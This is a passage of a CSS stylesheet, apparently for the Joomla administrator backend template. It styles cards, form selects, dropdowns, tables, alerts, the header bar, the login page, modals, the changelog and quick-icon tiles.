    -webkit-column-count: 3;
       -moz-column-count: 3;
            column-count: 3;
    -webkit-column-gap: 1.25rem;
       -moz-column-gap: 1.25rem;
            column-gap: 1.25rem;
    orphans: 1;
    widows: 1;
  }
  .card-columns .card {
    display: inline-block;
    width: 100%;
  }
}

.content .card {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.content .card-header {
  display: flex;
  padding: 1rem 1rem 0.75rem;
  font-weight: 700;
  color: var(--template-bg-dark);
  background: var(--card-bg);
}
.content .card-header > [class^=icon-],
.content .card-header > img {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.form-select, .custom-select {
  max-width: 100%;
  cursor: pointer;
  background: url("../images/select-bg.svg") no-repeat right center/116rem;
  background-color: var(--template-bg-light);
  border: solid 1px var(--template-bg-dark-20);
}
[dir=rtl] .form-select, [dir=rtl] .custom-select {
  padding: 0.5rem 1rem 0.5rem 4rem;
  background: url("../images/select-bg-rtl.svg") no-repeat left center/116rem;
  background-color: var(--template-bg-light);
}
.form-select[multiple], [multiple].custom-select {
  padding: 0;
  background-color: var(--white-offset);
}
.form-select[multiple] option, [multiple].custom-select option {
  padding: 0.3rem 1rem;
  background-color: var(--white-offset);
}
.form-select[multiple] option:checked, [multiple].custom-select option:checked {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark) !important;
}
.form-select.form-select-success, .form-select-success.custom-select, .form-select.custom-select-success, .custom-select-success.custom-select {
  color: var(--success);
  background-color: var(--success);
  border-color: var(--success);
}
.form-select.form-select-success option, .form-select-success.custom-select option, .form-select.custom-select-success option, .custom-select-success.custom-select option {
  color: var(--template-text-dark);
  background-color: var(--white-offset);
}
.form-select.form-select-danger, .form-select-danger.custom-select, .form-select.custom-select-danger, .custom-select-danger.custom-select {
  color: var(--danger);
  background-color: var(--danger);
  border-color: var(--danger);
}
.form-select.form-select-danger option, .form-select-danger.custom-select option, .form-select.custom-select-danger option, .custom-select-danger.custom-select option {
  color: var(--template-text-dark);
  background-color: var(--white-offset);
}
.form-select:focus, .custom-select:focus {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}
.form-select:disabled, .custom-select:disabled {
  cursor: default;
  background: #e8e8e8;
  border: 0;
  box-shadow: none;
}
.form-select optgroup, .custom-select optgroup,
.form-select option,
.custom-select option {
  color: var(--template-text-dark);
  background-color: #fff;
}

.accordion .card-header {
  display: block;
  font-size: 0.9286rem;
  font-weight: 700;
  line-height: 1.2;
}
.accordion .list-group-item {
  color: var(--template-link-color);
}

.btn-group .dropdown-menu {
  min-width: 100%;
  background: #fff;
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.15);
}
.btn-group .dropdown-menu joomla-toolbar-button {
  text-align: start;
  border: 0;
}

.dropdown-menu {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.dropdown-item {
  text-align: start;
  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
}
.btn-primary + .dropdown-menu .dropdown-item:hover, .btn-primary + .dropdown-menu .dropdown-item:focus {
  background-color: var(--template-bg-dark);
}
.btn-secondary + .dropdown-menu .dropdown-item:hover, .btn-secondary + .dropdown-menu .dropdown-item:focus {
  color: var(--template-text-light);
  background-color: var(--secondary);
}
.btn-danger + .dropdown-menu .dropdown-item:hover, .btn-danger + .dropdown-menu .dropdown-item:focus {
  background-color: var(--danger);
}
.btn-info + .dropdown-menu .dropdown-item:hover, .btn-info + .dropdown-menu .dropdown-item:focus {
  background-color: var(--info);
}
.dropdown-status-group .dropdown-menu .dropdown-item:hover:not(.disabled), .dropdown-status-group .dropdown-menu .dropdown-item:focus:not(.disabled) {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark);
}
.dropdown-save-group .dropdown-menu .dropdown-item:hover:not(.disabled), .dropdown-save-group .dropdown-menu .dropdown-item:focus:not(.disabled) {
  color: var(--template-text-light);
  background-color: var(--success);
}
.dropdown-item + .dropdown-item {
  border-top: 1px solid rgba(0, 0, 0, 0.1);
}
.dropdown-status-group .dropdown-menu .dropdown-item:not(.disabled) {
  color: var(--action);
}
.dropdown-save-group .dropdown-menu .dropdown-item:not(.disabled) {
  color: var(--success);
}
.dropdown-item.first:not(.last) {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.dropdown-item.last:not(.first) {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.dropdown-item:not(.first):not(.last):not(:only-of-type) {
  border-radius: 0;
}

label {
  margin-bottom: 0;
}

td .form-control {
  display: inline-block;
  width: auto;
}

legend {
  margin-bottom: 1.1rem;
  font-size: 1rem;
  font-weight: 400;
}

.checkboxes {
  padding-top: 5px;
}
.checkboxes .checkbox input {
  position: static;
  margin-left: 0;
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed=true] {
  box-shadow: 0 0 2px 1px var(--template-bg-dark);
}

select.form-control {
  background-color: var(--template-bg-light);
}

.field-media-wrapper {
  display: block;
  width: 100%;
  max-width: calc(50vw - 5rem);
}
.field-media-wrapper .field-media-preview {
  width: 100%;
  max-width: none;
}
.field-media-wrapper .button-select {
  background-color: #366342;
}
.field-media-wrapper .button-clear {
  background-color: #a32120;
}
.field-media-wrapper .button-clear > .fa-check,
.field-media-wrapper .button-select > .fa-times {
  color: #f8f9fa;
}
@media (max-width: 991.98px) {
  .field-media-wrapper {
    min-width: 100%;
  }
}

.form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
  display: inline-block;
  width: auto;
}

@media (max-width: 767.98px) {
  .form-inline .form-select, .form-inline .custom-select, .form-inline .form-control {
    width: 100%;
  }
}
.list-group-item {
  background-color: var(--white-offset);
}

.list-unstyled .list-unstyled {
  padding-left: 20px;
}

.jviewport-height10 {
  height: 10vh;
}
.jviewport-height20 {
  height: 20vh;
}
.jviewport-height30 {
  height: 30vh;
}
.jviewport-height40 {
  height: 40vh;
}
.jviewport-height50 {
  height: 50vh;
}
.jviewport-height60 {
  height: 60vh;
}
.jviewport-height70 {
  height: 70vh;
}
.jviewport-height80 {
  height: 80vh;
}
.jviewport-height90 {
  height: 90vh;
}
.jviewport-height100 {
  height: 100vh;
}

[class*=jviewport-height] iframe {
  height: 100%;
}

.modal-dialog.jviewport-width10 {
  width: 10vw;
}
.modal-dialog.jviewport-width20 {
  width: 20vw;
  max-width: none;
}
.modal-dialog.jviewport-width30 {
  width: 30vw;
  max-width: none;
}
.modal-dialog.jviewport-width40 {
  width: 40vw;
  max-width: none;
}
.modal-dialog.jviewport-width50 {
  width: 50vw;
  max-width: none;
}
.modal-dialog.jviewport-width60 {
  width: 60vw;
  max-width: none;
}
.modal-dialog.jviewport-width70 {
  width: 70vw;
  max-width: none;
}
.modal-dialog.jviewport-width80 {
  width: 80vw;
  max-width: none;
}
.modal-dialog.jviewport-width90 {
  width: 90vw;
  max-width: none;
}
.modal-dialog.jviewport-width100 {
  width: 100vw;
  max-width: none;
}

@media (max-width: 767.98px) {
  .modal-dialog {
    margin: 1.75rem auto;
  }
}
.modal-dialog .modal-body {
  padding: 0;
}

.pagination {
  margin: 1rem;
}

th {
  text-align: inherit;
  /* stylelint-disable-next-line */
  text-align: -webkit-match-parent;
}

.table thead th {
  font-size: 1rem;
}
.table thead th,
.table thead td {
  white-space: nowrap;
}
.sysinfo .table thead th,
.sysinfo .table thead td {
  white-space: normal;
}
.table thead a {
  color: var(--template-link-color);
}
.table thead a#sorted {
  font-weight: 500;
  color: #343a40;
}
@media (max-width: 767.98px) {
  .table thead .actions,
.table thead .actions-th1 {
    width: 28%;
  }
}
.table tbody tr:hover, .table tbody tr:focus, .table tbody tr:active {
  background-color: rgba(0, 0, 0, 0.075);
}
.table tbody tr:last-of-type th,
.table tbody tr:last-of-type td {
  border-bottom: 0;
}
.table tbody .itemnumber a.btn,
.table tbody .itemnumber span.btn {
  padding: 0.1rem 0.5rem;
  text-decoration: none;
}
.table tbody th {
  font-weight: 500;
}
.table tbody a:not(.badge) {
  text-decoration: underline;
}
.table th label,
.table td label {
  margin-bottom: 0;
}
.table th .inactive [class^=icon-],
.table th .inactive [class*=" icon-"],
.table th .inactive [class^=fa-],
.table th .inactive [class*=" fa-"],
.table td .inactive [class^=icon-],
.table td .inactive [class*=" icon-"],
.table td .inactive [class^=fa-],
.table td .inactive [class*=" fa-"] {
  color: #cdcdcd;
}
.j-main-container > .table {
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.alert {
  margin: 1rem 0;
  border-right: 0;
  border-left: 0;
  border-radius: 0.2rem;
}
.alert.alert-info {
  color: var(--template-bg-dark);
  background-color: var(--template-bg-dark-10);
  border: 1px solid var(--template-bg-dark-20);
}
.alert.alert-warning {
  color: #996900;
  background-color: #fffcf4;
  border: 1px solid #ffb514;
}
.alert.alert-success {
  color: #457d54;
  background-color: #f2f8f4;
  border: 1px solid hsl(var(--hue), 50%, 93%);
}
.alert.alert-error {
  color: #c52827;
  background-color: #fef8f8;
  border: 1px solid #c52827;
}

.alert-parent {
  margin-top: 0;
}

fieldset .alert.alert-info {
  margin: -1rem 0 1rem;
}

.alert-heading {
  font-size: 1rem;
}

@-webkit-keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translateY(-15px);
            transform: translateY(-15px);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0);
            transform: translateY(0);
  }
}

@keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translateY(-15px);
            transform: translateY(-15px);
  }
  to {
    opacity: 1;
    -webkit-transform: translateY(0);
            transform: translateY(0);
  }
}
.title-alias .form-control {
  max-width: 100%;
}
.title-alias .form-control-feedback {
  position: absolute;
  right: 1rem;
  bottom: -1.8rem;
  text-align: right;
}

.layout-edit .title-alias .form-group {
  box-shadow: none;
}

.header {
  z-index: 1020;
  color: #fff;
  background: var(--template-bg-dark);
}
.header-inside {
  display: flex;
  min-height: 54px;
}
.header a {
  color: #fff;
}
.header a:before {
  display: none;
}
.header .logo {
  display: flex;
  flex-flow: row nowrap;
  align-items: center;
  width: 18rem;
  height: 100%;
  padding: 12px 5px;
  overflow: hidden;
  background-color: var(--template-bg-dark-70);
  transition: all 0.3s ease-in-out;
}
.header .logo.small {
  width: 3rem;
  transition: all 0.3s ease-in-out;
}
.header .logo.small svg:not(.logo-collapsed),
.header .logo.small img:not(.logo-collapsed) {
  display: none;
}
.header .logo.small svg.logo-collapsed,
.header .logo.small img.logo-collapsed {
  display: inline-block;
  width: 20px;
  height: 20px;
  -o-object-fit: contain;
     object-fit: contain;
  -o-object-position: center center;
     object-position: center center;
}
.header .logo svg,
.header .logo img {
  width: 150px;
  height: 30px;
  margin: 0 0.35rem;
  -o-object-fit: contain;
     object-fit: contain;
  -o-object-position: left center;
     object-position: left center;
}
[dir=rtl] .header .logo svg,
[dir=rtl] .header .logo img {
  -o-object-position: right center;
     object-position: right center;
}
.header .logo svg.logo-collapsed,
.header .logo img.logo-collapsed {
  display: none;
}
.header .page-title {
  padding: 0 1rem;
  margin: 0;
  overflow: hidden;
  font-size: 1.2rem;
  color: #fff;
  text-overflow: ellipsis;
  white-space: nowrap;
}
.header .page-title > span {
  -webkit-margin-end: 0.25rem;
          margin-inline-end: 0.25rem;
}
.header .dropdown-menu {
  font-size: 0.85rem;
}
.header .dropdown-header,
.header .dropdown-item {
  padding: 0.82rem 0.75rem;
  color: #fff;
  background-color: var(--template-bg-dark-70);
}
.header .dropdown-header > span,
.header .dropdown-item > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.header .dropdown-header:hover,
.header .dropdown-item:hover {
  background-color: var(--template-bg-dark);
}
.header .dropdown-header {
  padding: 0.75rem;
  font-size: inherit;
  background-color: var(--template-bg-dark);
}

.header-items {
  align-items: center;
  justify-content: flex-end;
  width: 50%;
  margin: 15px;
  -webkit-margin-start: auto;
          margin-inline-start: auto;
}
.header-items .dropdown-toggle {
  background-color: transparent;
  border: 0;
}
.header-items .dropdown-toggle::after {
  display: none;
}

.header-item {
  position: relative;
  margin: 0 4px;
}

.header-item-content {
  display: flex;
  align-items: center;
  line-height: 1rem;
  color: #fff;
  background-color: var(--template-bg-dark-60);
  border-radius: 22px;
  -webkit-padding-end: 4px;
          padding-inline-end: 4px;
}
.header-item-content a,
.header-item-content button {
  color: #fff;
  text-decoration: none;
}
.header-item-content a {
  display: flex;
}
.header-item-content:not(.no-link):not(.joomlaversion):hover {
  background-color: var(--template-bg-dark-50);
}
.header-item-content.joomlaversion {
  color: var(--bluegray);
  background-color: transparent;
}
.header-item-content.joomlaversion .header-item-text {
  -webkit-padding-end: 12px;
          padding-inline-end: 12px;
}

.header-item-icon > * {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 28px;
  min-width: 28px;
  height: 28px;
  margin: 4px;
  color: #fff;
  background-color: var(--template-bg-dark);
  border-radius: 16px;
}
.header-item-icon span {
  margin: 4px;
}

.header-item-count {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.header-item-text {
  padding: 0 8px 0 4px;
  font-size: 0.75rem;
  white-space: nowrap;
}

.header-more-btn {
  margin: 0 5px;
  font-size: 1.7rem;
}

.header-dd-items .header-item-content {
  background: transparent;
}
.header-dd-items .header-item-text {
  font-size: 0.75rem;
}
.header-dd-items .dropdown-item {
  padding: 0.5rem 0.75rem;
}

.header-dd-item {
  padding: 3px 6px;
}

@media (max-width: 767.98px) {
  .header-items {
    position: fixed;
    bottom: 0;
    flex-direction: row-reverse;
    width: 100%;
    padding: 10px 0;
    margin: 0;
    background: var(--template-bg-dark);
  }
  .header-items .icon-angle-down,
.header-items .fa-angle-down {
    -webkit-transform: rotate(180deg);
            transform: rotate(180deg);
  }

  .header-item-more.active .header-more-menu {
    left: 0;
  }
  [dir=rtl] .header-item-more.active .header-more-menu {
    right: 0;
    left: auto;
  }
  .header-item-more .header-item-content {
    background: transparent;
  }

  .header-more-menu {
    top: auto;
    bottom: 100%;
  }
}
.form-control {
  max-width: 100%;
  background-color: #fff;
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
.form-control:focus {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}

.control-group {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  margin: 0 0 1rem;
}
.control-group > .form-check {
  display: inline-block;
}
.control-group::after {
  display: table;
  clear: both;
  content: "";
}
.control-group .control-label {
  width: 240px;
  padding: 0.3rem 1rem 0.3rem 0;
}
.control-group .controls {
  position: relative;
  flex: 1;
  min-width: 210px;
}
.control-group .controls + div {
  width: 100%;
  margin: 5px 0 10px;
}
.form-vertical .control-group {
  flex-direction: column;
}

.spacer hr {
  width: 380px;
}
.spacer label {
  width: 440px;
}

td .form-control {
  display: inline-block;
  width: auto;
}

.checkboxes {
  padding-top: 5px;
}
.checkboxes .checkbox input {
  position: static;
  margin-left: 0;
}

.form-check {
  padding-top: 5px;
  margin-bottom: 0;
}

.modal label {
  width: 100%;
}

.invalid {
  color: var(--danger);
  border-color: var(--danger);
}

.valid {
  border-color: var(--success);
}

.form-control-feedback {
  display: block;
}

[aria-grabbed=true] {
  box-shadow: inset 0 0 0 0.1rem #e9e9e9;
}

.sortable-handler.inactive {
  opacity: 0.3;
}

[role=tooltip]:not(.show) {
  z-index: 1070;
  display: none;
  padding: 0.5em;
  margin: 0.25em;
  color: #fff;
  text-align: start;
  background: #000;
  border-radius: 0.2rem !important;
}

:focus + [role=tooltip],
:hover + [role=tooltip] {
  position: absolute;
  display: block;
}

[id="filter[search]-desc"] {
  bottom: 100%;
}

.container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}

.input-group > .form-control[readonly] {
  margin-right: 1px;
}

div.subform-repeatable-group {
  position: relative;
  padding: 32px 32px 16px 28px;
  margin-top: 20px;
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
div.subform-repeatable-group > .btn-toolbar .btn-group {
  position: static;
}
div.subform-repeatable-group > .btn-toolbar .btn {
  position: absolute;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-add {
  right: -1px;
  bottom: -1px;
  border-radius: 0.25rem 0 0.25rem 0;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-remove {
  top: -1px;
  right: -1px;
  border-radius: 0 0.25rem 0 0.25rem;
}
div.subform-repeatable-group > .btn-toolbar .btn.group-move {
  top: 50%;
  right: 100%;
  margin-top: -27px;
  line-height: 52px;
  border-radius: 0.25rem 0 0 0.25rem;
}

.subform-repeatable-group[draggable=true] {
  background-color: #20c997;
}
.subform-repeatable-group[draggable=true] > td {
  background-color: #20c997;
}

.icon-white {
  color: #fff;
}

.tbody-icon {
  padding: 0 3px;
  text-align: center;
  background-color: transparent;
  border: 0;
}
.tbody-icon [class^=icon-],
.tbody-icon [class*=" icon-"],
.tbody-icon [class^=fa-],
.tbody-icon [class*=" fa-"] {
  width: 26px;
  height: 26px;
  font-size: 1rem;
  line-height: 22px;
  color: #cdcdcd;
  border: 2px solid var(--border);
  border-radius: 50%;
}
.tbody-icon .icon-publish,
.tbody-icon .icon-check,
.tbody-icon .fa-check {
  color: var(--success);
  border-color: var(--success);
}
.tbody-icon .icon-home,
.tbody-icon .icon-color-featured,
.tbody-icon .icon-star.featured,
.tbody-icon .fa-star.featured {
  color: #ffb514;
  border-color: #ffb514;
}
.tbody-icon .icon-archive,
.tbody-icon .icon-folder,
.tbody-icon .fa-folder {
  color: var(--template-text-dark);
  border-color: #495057;
}
.tbody-icon .icon-checkedout,
.tbody-icon .icon-lock,
.tbody-icon .fa-lock {
  width: auto;
  height: auto;
  font-size: 1.2rem;
  line-height: 1rem;
  color: var(--template-text-dark);
  border: 0;
}
.tbody-icon.home-disabled, .tbody-icon.featured-disabled, .tbody-icon.color-featured-disabled, .tbody-icon.icon-star-disabled, .tbody-icon.fa-star-disabled {
  cursor: not-allowed;
  opacity: 1;
}
.tbody-icon.disabled .icon-home, .tbody-icon.disabled .fa-home {
  color: #fffcf4;
  border-color: #fffcf4;
}

.plg_system_webauthn_login_button svg {
  -webkit-margin-end: 2px;
          margin-inline-end: 2px;
}

.plg_system_webauthn_login_button svg path {
  fill: var(--white);
}

.badge > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

iframe {
  border: 0;
}

.modal iframe {
  width: 100%;
}

.options-form {
  width: 100%;
  padding: 1vw 2vw;
  margin-bottom: 1rem;
  color: var(--template-text-dark);
  border: 1px solid var(--template-bg-dark-20);
}
.options-form > legend {
  float: none;
  width: auto;
  padding: 0 1rem;
  font-weight: 700;
  color: var(--template-text-dark);
  background-color: #fff;
}

.view-login .container-main,
.task-logout .container-main {
  order: 1;
}
@media (max-width: 767.98px) {
  .view-login .container-main,
.task-logout .container-main {
    display: flex;
    flex-wrap: wrap;
    align-items: center;
    justify-content: center;
    min-height: calc(100vh - 35vh);
  }
}
@media (max-width: 767.98px) {
  .view-login .container-main #content,
.task-logout .container-main #content {
    max-width: 98%;
    padding: 0;
  }
}
.view-login .login,
.task-logout .login {
  width: 100%;
  max-width: 25rem;
  padding: 30px;
  margin: 1rem;
  color: var(--template-text-dark);
  background: var(--white);
  border-radius: 10px;
  box-shadow: 0 4px 20px -10px var(--template-bg-dark-50);
}
@media (max-width: 991.98px) {
  .view-login .login,
.task-logout .login {
    margin-bottom: 3rem;
  }
}
.view-login .login img,
.task-logout .login img {
  max-height: 4.4rem;
}
.view-login .login .logo,
.task-logout .login .logo {
  padding: 0 20px 20px;
}
.view-login .login svg.joomla-logo,
.task-logout .login svg.joomla-logo {
  width: 2.4rem;
  height: 4.4rem;
  background-size: 4.4rem 2.4rem;
}
.view-login .login svg.joomla-logo path,
.task-logout .login svg.joomla-logo path {
  fill: var(--template-bg-dark);
}
.view-login .login-watermark,
.task-logout .login-watermark {
  position: absolute;
  z-index: -1;
  max-width: 500px;
  -webkit-transform: rotate(12deg) translate(40%, 10%);
          transform: rotate(12deg) translate(40%, 10%);
}
.view-login .form-group,
.task-logout .form-group {
  position: relative;
  margin-bottom: 1.85rem;
}
.view-login .form-group label span,
.task-logout .form-group label span {
  font-size: 0.9rem;
}
@media (max-width: 575.98px) {
  .view-login .form-group label span,
.task-logout .form-group label span {
    width: 100%;
  }
}
.view-login .form-group label span.text-end,
.task-logout .form-group label span.text-end {
  font-size: 0.75rem;
  color: var(--template-special-color);
}
.view-login .form-group .form-control-feedback,
.task-logout .form-group .form-control-feedback {
  position: absolute;
  right: 0;
  bottom: -1.5rem;
  font-size: 0.75rem;
  text-align: right;
}
[dir=rtl] .view-login .form-group .form-control-feedback,
[dir=rtl] .task-logout .form-group .form-control-feedback {
  right: auto;
  left: 0;
  text-align: left;
}
.view-login .form-group .form-control-hint,
.task-logout .form-group .form-control-hint {
  position: absolute;
  top: 0.1rem;
  right: 0;
  font-size: 0.75rem;
  text-align: right;
}
[dir=rtl] .view-login .form-group .form-control-hint,
[dir=rtl] .task-logout .form-group .form-control-hint {
  right: auto;
  left: 0;
  text-align: left;
}
.view-login input:focus,
.view-login select:focus,
.task-logout input:focus,
.task-logout select:focus {
  background: #fff;
  box-shadow: inset 0 0 1px 1px var(--template-contrast);
}
.view-login h1, .view-login .h1,
.task-logout h1,
.task-logout .h1 {
  margin-bottom: 0.25rem;
  color: #fff;
  text-align: center;
}
.view-login h2, .view-login .h2,
.task-logout h2,
.task-logout .h2 {
  font-weight: 400;
  color: var(--template-bg-dark-10);
}
@media (max-width: 575.98px) {
  .view-login .btn,
.task-logout .btn {
    padding: 8px 10px;
    font-size: 0.875rem;
  }
}
.view-login .form-control,
.view-login .form-select,
.view-login .custom-select,
.task-logout .form-control,
.task-logout .form-select,
.task-logout .custom-select {
  max-width: none;
}
.view-login .sidebar-wrapper,
.view-login .header .logo,
.task-logout .sidebar-wrapper,
.task-logout .header .logo {
  flex: 1 0 400px;
}
.view-login .sidebar-wrapper,
.task-logout .sidebar-wrapper {
  display: flex;
  flex-direction: column;
  max-width: none;
  background-color: var(--template-sidebar-bg);
}
@media (max-width: 767.98px) {
  .view-login .sidebar-wrapper,
.task-logout .sidebar-wrapper {
    order: 2;
    margin-bottom: 3rem;
  }
}
.view-login .sidebar-wrapper .main-brand,
.task-logout .sidebar-wrapper .main-brand {
  margin-bottom: auto;
}
.view-login .sidebar-wrapper .main-brand a,
.task-logout .sidebar-wrapper .main-brand a {
  font-size: 0.875rem;
}
.view-login .sidebar-wrapper .card-header,
.task-logout .sidebar-wrapper .card-header {
  font-size: 1.125rem;
  color: #fff;
}
.view-login #sidebar,
.task-logout #sidebar {
  align-self: flex-end;
  width: 100%;
  font-size: 0.875rem;
  color: var(--template-text-light);
  text-align: center;
}
.view-login #sidebar .card,
.task-logout #sidebar .card {
  background: rgba(0, 0, 0, 0.1);
  box-shadow: none;
}
.view-login #sidebar .card .module-body,
.task-logout #sidebar .card .module-body {
  padding: 0.75rem 1.25rem;
}
@media (max-width: 767.98px) {
  .view-login #sidebar,
.task-logout #sidebar {
    position: relative;
    bottom: 0;
  }
}
@media (max-width: 767.98px) {
  .view-login .container-main,
.view-login .sidebar-wrapper,
.task-logout .container-main,
.task-logout .sidebar-wrapper {
    flex: 1 0 100% !important;
    max-width: 100% !important;
    min-height: auto;
  }
}
.view-login .wrapper,
.task-logout .wrapper {
  display: flex;
}
@media (max-width: 767.98px) {
  .view-login .wrapper,
.task-logout .wrapper {
    flex-direction: column;
  }
}
.view-login .header,
.task-logout .header {
  display: flex;
}
.view-login .header .logo.small,
.task-logout .header .logo.small {
  line-height: 2.5rem;
}
@media (max-width: 767.98px) {
  .view-login .header,
.task-logout .header {
    background: var(--template-bg-dark-70);
  }
}

label {
  color: #132f53;
}

.com_login .sidebar-wrapper .main-brand {
  flex: 1;
  flex-basis: auto;
  margin-top: 100px;
  text-align: center;
}
@media (max-width: 767.98px) {
  .com_login .sidebar-wrapper .main-brand {
    margin-top: 10px;
  }
}

.com_login .sidebar-wrapper #sidebar p {
  margin-bottom: 0.2rem;
}

.com_login .sidebar-wrapper .main-brand a,
.com_login .sidebar-wrapper #sidebar,
.com_login .sidebar-wrapper #sidebar a {
  color: var(--template-text-light);
}

@media (max-width: 767.98px) {
  .view-login #wrapper.d-flex {
    display: flex !important;
  }
}
@media (max-width: 767.98px) {
  .view-login #sidebar-wrapper:not(.show):not(.collapse) {
    display: block;
  }
}
.view-login .invalid .form-control-feedback {
  color: var(--danger);
}

.ie11 {
  display: none;
}

@media all and (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .ie11 {
    display: block;
  }
}
.login_message {
  margin: 1rem 1rem 0;
}

.modal .btn {
  padding: 0 22px;
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  font-size: 1rem;
  line-height: 2.3rem;
  color: var(--template-text-dark);
  background: var(--white);
  border-color: var(--whiteoffset);
  box-shadow: 1px 1px 1px 0 rgba(0, 0, 0, 0.25);
}
.modal .btn-primary:not([href]),
.modal .btn-success:not([href]),
.modal .btn-danger:not([href]),
.modal .btn-secondary:not([href]) {
  color: var(--template-text-dark);
  background: var(--white);
  border: 1px solid var(--template-text-dark);
}
.modal .btn-primary:not([href]):hover {
  color: var(--white);
  background: var(--primary);
  border-color: var(--primary);
}
.modal .btn-secondary:not([href]):hover {
  color: var(--white);
  background: var(--secondary);
  border-color: var(--secondary);
}
.modal .btn-success:not([href]):hover {
  color: var(--white);
  background: var(--success);
  border-color: var(--success);
}
.modal .btn-danger:not([href]):hover {
  color: var(--white);
  background: var(--danger);
  border-color: var(--danger);
}
.modal .btn.btn-danger [class^=icon-],
.modal .btn.btn-danger [class*=" icon-"],
.modal .btn.btn-danger [class^=fa-],
.modal .btn.btn-danger [class*=" fa-"],
.modal .btn.btn-danger span {
  display: inline-block;
  width: 2.375rem;
  height: 100%;
  margin: 0 16px;
  -webkit-margin-start: -22px;
          margin-inline-start: -22px;
  line-height: 2.375rem;
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--danger);
}
.modal .btn.btn-success [class^=icon-],
.modal .btn.btn-success [class*=" icon-"],
.modal .btn.btn-success [class^=fa-],
.modal .btn.btn-success [class*=" fa-"],
.modal .btn.btn-success span {
  display: inline-block;
  width: 2.375rem;
  height: 100%;
  margin: 0 16px;
  -webkit-margin-start: -22px;
          margin-inline-start: -22px;
  line-height: 2.375rem;
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--success);
}

.modal-header {
  padding: 0 15px;
}

.modal-body {
  overflow-y: initial;
}

.modal-title {
  font-weight: 400;
  line-height: 2.875rem;
}

.contentpane {
  padding: 20px;
}

.changelog {
  text-align: start !important;
}
.changelog__item {
  display: flex;
  border-bottom: 1px solid #dee2e6;
}
@media (max-width: 767.98px) {
  .changelog__item {
    flex-direction: column;
  }
}
.changelog__tag {
  flex: 1 0 180px;
  max-width: 180px;
  padding: 10px 15px;
  text-align: end;
  background: #f1f3f5;
  border-right: 1px solid #dee2e6;
}
.changelog__tag .badge {
  border-radius: 0.2rem;
}
.changelog__tag .badge.badge-jlanguage {
  background-color: #fff;
}
@media (max-width: 767.98px) {
  .changelog__tag {
    flex: 1 0 auto;
    max-width: 100%;
    text-align: left;
    border-right: 0;
    border-bottom: 1px solid #dee2e6;
  }
}
.changelog__list {
  padding: 10px 15px;
}
.changelog__list ul {
  -webkit-padding-start: 15px;
          padding-inline-start: 15px;
  margin-bottom: 0;
}
.changelog__list li {
  margin-bottom: 0.15rem;
}
.changelog__list li:last-of-type {
  margin-bottom: 0;
}

.quick-icons {
  background-color: #fff;
}
.quick-icons .nav {
  display: grid;
  grid-template-columns: repeat(auto-fit, minmax(190px, 1fr));
  grid-gap: 1rem;
}
.quick-icons a {
  text-decoration: none;
}
.quick-icons ul {
  padding: 0;
}
.quick-icons .quickicon {
  --text-color: hsl(var(--hue), 30%, 40%);
  --bg-color: hsl(var(--hue), 60%, 97%);
  --icon-color: hsl(var(--hue), 30%, 40%);
  --bg-color-hvr: var(--template-bg-dark);
  display: flex;
  flex-grow: 1;
}
.quick-icons .quickicon a {
  display: flex;
  flex-direction: column;
  flex-grow: 1;
  justify-content: flex-end;
  padding: 0 1rem;
  color: var(--text-color);
  background-color: var(--bg-color);
  transition: all 0.25s ease;
}
.quick-icons .quickicon a .quickicon-icon {
  margin-top: 0.5rem;
  -webkit-margin-start: 0.2rem;
          margin-inline-start: 0.2rem;
}
.quick-icons .quickicon a .quickicon-icon > * {
  font-size: 2rem;
  color: var(--icon-color);
}
.quick-icons .quickicon a .quickicon-name {
  padding: 0.125rem 0 0.6rem;
  font-size: 0.875rem;
  font-weight: bold;
}
.quick-icons .quickicon a .quickicon-amount {
  padding: 0.25rem 0.5rem;
  font-weight: 700;
  line-height: 1rem;
  background: hsl(var(--hue), 50%, 93%);
  border-radius: 0.25rem;
  transition: all 0.25s ease;
  -webkit-margin-start: 0.5rem;
          margin-inline-start: 0.5rem;
}
.quick-icons .quickicon a .j-links-link {
  display: block;
  padding: 0 0.2rem;
  line-height: 1.1;
}
.quick-icons .quickicon a:hover, .quick-icons .quickicon a:focus, .quick-icons .quickicon a:active {
  color: #fff;
  text-decoration: none;
  background: var(--bg-color-hvr);
}
.quick-icons .quickicon a:hover .quickicon-amount, .quick-icons .quickicon a:focus .quickicon-amount, .quick-icons .quickicon a:active .quickicon-amount {
  background: var(--icon-color);
}
.quick-icons .quickicon a.warning, .quick-icons .quickicon a.danger {
  --text-color: var(--danger);
  --bg-color: #f4f0f0;
  --icon-color: #ce8484;
  --bg-color-hvr: var(--danger);
}
.quick-icons .quickicon a.success {
  --text-color: var(--success);
